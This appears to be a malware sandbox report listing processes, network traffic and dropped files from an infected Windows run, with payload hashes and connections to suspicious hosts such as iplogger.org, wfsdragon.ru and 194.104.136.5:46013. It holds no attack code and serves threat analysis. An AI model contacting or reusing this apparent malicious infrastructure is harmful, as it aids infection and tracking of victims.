"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2580 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3292,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4588 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 852

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3764,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 1060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 1084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 1328

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5016,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5032 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5048,i,17630423203768120228,7370742622864521412,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 660

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 1068

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 ip-api.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 ppgggb.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
N/A 127.0.0.1:53429 tcp
N/A 127.0.0.1:53432 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 101.209.201.84.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
GB 72.247.176.16:80 r11.o.lencr.org tcp
US 8.8.8.8:53 60.37.61.92.in-addr.arpa udp
US 8.8.8.8:53 69.5.217.23.in-addr.arpa udp
US 8.8.8.8:53 16.176.247.72.in-addr.arpa udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 172.217.16.227:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 c12fe256228c8c0403ef35279aca6f58
SHA1 840a4eaf832f3cd154f0766dbc415a32c181e200
SHA256 86271c0587581b77766414a1238238011c10a5a06255b4611ac3b058f4529c2b
SHA512 88689761f0eeedc4ff633744dab15b26ad7352bda1f0329ed920dce463118ea11a14249cfd636aa3d39dbdabbcb1342138b7b5255a3791faf8ad955c63f5ff11

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe

MD5 47a5d34f871487a79975e5586e63ebdd
SHA1 75f4f1708c2b0a6433f8c0fa6ff47799115b2d2f
SHA256 884c76e10ef7f202b677c0ccfb6e9e009ca79e7189e76509a6449b5f8c2a952f
SHA512 3f96662af4937647a78a0a51cb4916f56ee250ab14094ed608344d727489eb0135b4016a73853ca1f96b165fbe9ac7957adb1cc884fff55cea837f668b157d04

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/3324-68-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3324-69-0x0000000064941000-0x000000006494F000-memory.dmp

memory/3324-80-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3324-79-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3324-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/5064-81-0x00000000048F0000-0x0000000004926000-memory.dmp

memory/3324-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4916-85-0x00000000053B0000-0x0000000005416000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bjpxbt3k.1n2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14f1396dfcf191bd.exe

MD5 15c6dc87edd001c0bf0df6f9405ad7db
SHA1 9582017cd83642ffdac143daeed13e840f4b2350
SHA256 5e7a5af6e0cea11934feaa716867e906644eb20df743b1c5fa85558de0c1b10d
SHA512 6fffd09475af31c9cdc56f561c13921975c236c6590ede369e5d863469452a6224d2ee9550d9f73fb65696c9d46185e487bf0764922c95831882a8029151603f

memory/3196-109-0x0000000000530000-0x0000000000548000-memory.dmp

memory/4916-121-0x0000000005A30000-0x0000000005A4E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14514904a4b.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

memory/4508-125-0x0000000000550000-0x0000000000558000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14d32a38896785b13.exe

MD5 148c3657379750b2fe7237ac1b06f507
SHA1 c464da9412a32ab71cd62491405296672c7ba3ad
SHA256 41a780cbf232d3ed4912406bdbb084f61c9faf56dcc0a7a81381546689170c64
SHA512 360588010bda2d3d514508fe9f2f95f63ca7a78476e24043985c350814c54f25c1f60c45e68e4431c2301f90b4092f88866624b12eb637145403592e7218d6bc

memory/4916-123-0x0000000005AD0000-0x0000000005B1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1487ca754e680f91.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/3196-120-0x00000000025B0000-0x00000000025B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe

MD5 a1d90c2ea649aae4d9492b584c52ef5c
SHA1 32969454090b6dd84a9b97d19bd58845cda5aae6
SHA256 64f7fc506342b8fd9bf09d45a012f9c996237e06cffbade5d3aedb1c8d967023
SHA512 09bf2aa523933dc05fb23a6d97f56ba33ba5894667b62f2275a4e94b86e9ac82d6faeda7dfdc0ac1c966fe13b0be29ae98158850d815021bd88837a3453b6e73

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe

MD5 77666d51bc3fc167013811198dc282f6
SHA1 18e03eb6b95fd2e5b51186886f661dcedc791759
SHA256 6a3d44d750ba258b1854431d89db135abc5d543ada1b384c5306e98031b8f1c9
SHA512 a024f008567a7417fe975063f661a0b278fb70c7576a7453e482f2e3f5c6cc48b5faaa55ec197e3082626faaa3598c9ff7bcca798ba7a1408bf666e61fdf4cd0

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe

MD5 9b07fc470646ce890bcb860a5fb55f13
SHA1 ef01d45abaf5060a0b32319e0509968f6be3082f
SHA256 506c6ee68b29701403739da25679b640d21b1b121f45dde5bc25705901a6ed0b
SHA512 4cc1b725c6fb539d832d2d5315bbc63e967a41129d25c2102b2df19e4931e4e06c2a9f70a3336d98b9e031c636d021e713f10dbbd86a57f447a7581221a470cc

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe

MD5 8e0abf31bbb7005be2893af10fcceaa9
SHA1 a48259c2346d7aed8cf14566d066695a8c2db55c
SHA256 2df6cc430475ae053ad2772a3a9d1de1a03af31c3ebfdd0e5d5bd7fbdc61866a
SHA512 ba76470f4896e6bdac508e6a901b352a3bf731ab5680b9931cc1a8c874482cf0c19a374a6a58dda5237178c1861509529a5174bf76fa768efac7989dbc1c1970

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe

MD5 492fe12bd7a2ea0ba1d2a5672f5a013a
SHA1 934a18ff3f83a43ce8c4a3cacba0d30d82c4276c
SHA256 45e13af971ea12864fd315f67096d0547bee1e07994f16bfedba10ca5beaad0f
SHA512 de5c99a7e20949bcd75bde8d971b343a6bae5255b5d46dd9472fde13ab0c3b4ce317eaf44527f79a113e2bd0b0efb0d19a5a53834e9b28a41b4885a888bcfd67

memory/4444-133-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat144474a564d26f29.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142ac5249376e895.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\is-Q0LEB.tmp\Sat1481f5a7e3eccdd.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/4080-142-0x0000000000EC0000-0x0000000000F28000-memory.dmp

memory/4080-153-0x00000000056C0000-0x00000000056DE000-memory.dmp

memory/4080-143-0x0000000005740000-0x00000000057B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe

MD5 4d255e96e5056f2c899884babcc55691
SHA1 44caeb1df6288c94081b805ee17f66db34dc7834
SHA256 e7678a0537796c6199bbc7fc5c143b475280564558250df218d62012c3b98506
SHA512 ad2cebd784a525d3fe2e3523c4f3d2ab793da84811a41b08aae99141d9c53f545b180d36f05647ddef04bba200b6a0fc917e481913f3b2b0162c136ec8355c44

memory/4916-95-0x0000000005430000-0x0000000005784000-memory.dmp

memory/4916-84-0x0000000005340000-0x00000000053A6000-memory.dmp

memory/4916-83-0x0000000004A70000-0x0000000004A92000-memory.dmp

memory/4916-82-0x0000000004CA0000-0x00000000052C8000-memory.dmp

memory/3324-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3324-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3324-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3324-73-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3324-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3324-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/3324-66-0x0000000000F10000-0x0000000000F9F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-A8IQH.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/3324-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3324-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/4080-157-0x0000000005F30000-0x00000000064D4000-memory.dmp

memory/5104-162-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4564-159-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4444-164-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-DC1JJ.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/4808-190-0x0000000000400000-0x0000000000883000-memory.dmp

memory/4916-192-0x0000000006A40000-0x0000000006AE3000-memory.dmp

memory/4916-191-0x00000000069C0000-0x00000000069DE000-memory.dmp

memory/4916-180-0x000000006F740000-0x000000006F78C000-memory.dmp

memory/4916-179-0x0000000006A00000-0x0000000006A32000-memory.dmp

memory/4916-197-0x0000000006D60000-0x0000000006D7A000-memory.dmp

memory/4916-196-0x00000000073A0000-0x0000000007A1A000-memory.dmp

memory/4916-198-0x0000000006DE0000-0x0000000006DEA000-memory.dmp

memory/5064-199-0x000000006F740000-0x000000006F78C000-memory.dmp

memory/4916-210-0x0000000006FD0000-0x0000000007066000-memory.dmp

memory/4916-214-0x0000000006F60000-0x0000000006F71000-memory.dmp

memory/4916-215-0x0000000006F90000-0x0000000006F9E000-memory.dmp

memory/4552-220-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat1427fbafcf251.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/4552-221-0x00000000054B0000-0x0000000005AC8000-memory.dmp

memory/4552-223-0x0000000005120000-0x000000000522A000-memory.dmp

memory/4916-224-0x0000000006FA0000-0x0000000006FB4000-memory.dmp

memory/4552-222-0x0000000004FF0000-0x0000000005002000-memory.dmp

memory/4552-225-0x0000000005050000-0x000000000508C000-memory.dmp

memory/4916-226-0x0000000007090000-0x00000000070AA000-memory.dmp

memory/4916-227-0x0000000007080000-0x0000000007088000-memory.dmp

memory/5064-230-0x0000000007430000-0x0000000007444000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2edbefff067e8e9e714f0d5589bcfc5b
SHA1 2cf5c175253d998a496b6a03d910d1702a37a973
SHA256 c9f47d817dff2000bf30f1a3e99590a7ca3004a2d79bc44f908a493ba0fd7817
SHA512 e473070ad505adf395b4222c50c19315c2fb11fae517d70567d79742e3e6d993977732bb300f453b17f3d08c00a6768c19383c45ceb1cd8497c4a226f62fd246

C:\Users\Admin\AppData\Local\Temp\lkyqBUE.m

MD5 ce2da93761dc1ddb916fd1474c2a4e8f
SHA1 5d04fad0fd8df47a2cf322288a9ef5bbe85a783c
SHA256 c5284035228617e55e3ddb94d5900a0a460d292ad121b8ad6f0c10497a700673
SHA512 77f4dfa33e102f0b3d94a167413f3ef30dcd522d4a3c000203521449e385bba4b5691f38408e75b378cc62d9fed98b460e6e1daa0251332aa9105d52d54a5b44

C:\Users\Admin\AppData\Local\Temp\vuR_hcMP.3T

MD5 c7d6c3ce016c46c94cfcda0c814f2889
SHA1 a552326f590bbf8d2f9a69a23863cefd83ff9687
SHA256 733e5e284c182b6de7e2d287a4b12722cfba8c393dd82bb11c766cbe5b94bb43
SHA512 6c6e7538a0f5c91be742caaab91cc3e87f8574a2a492831015f16d8e01e3fb9a9f11abc3155b4c573c7305e4057ce6013f2cbf4dd710b4a2773339790ea97a08

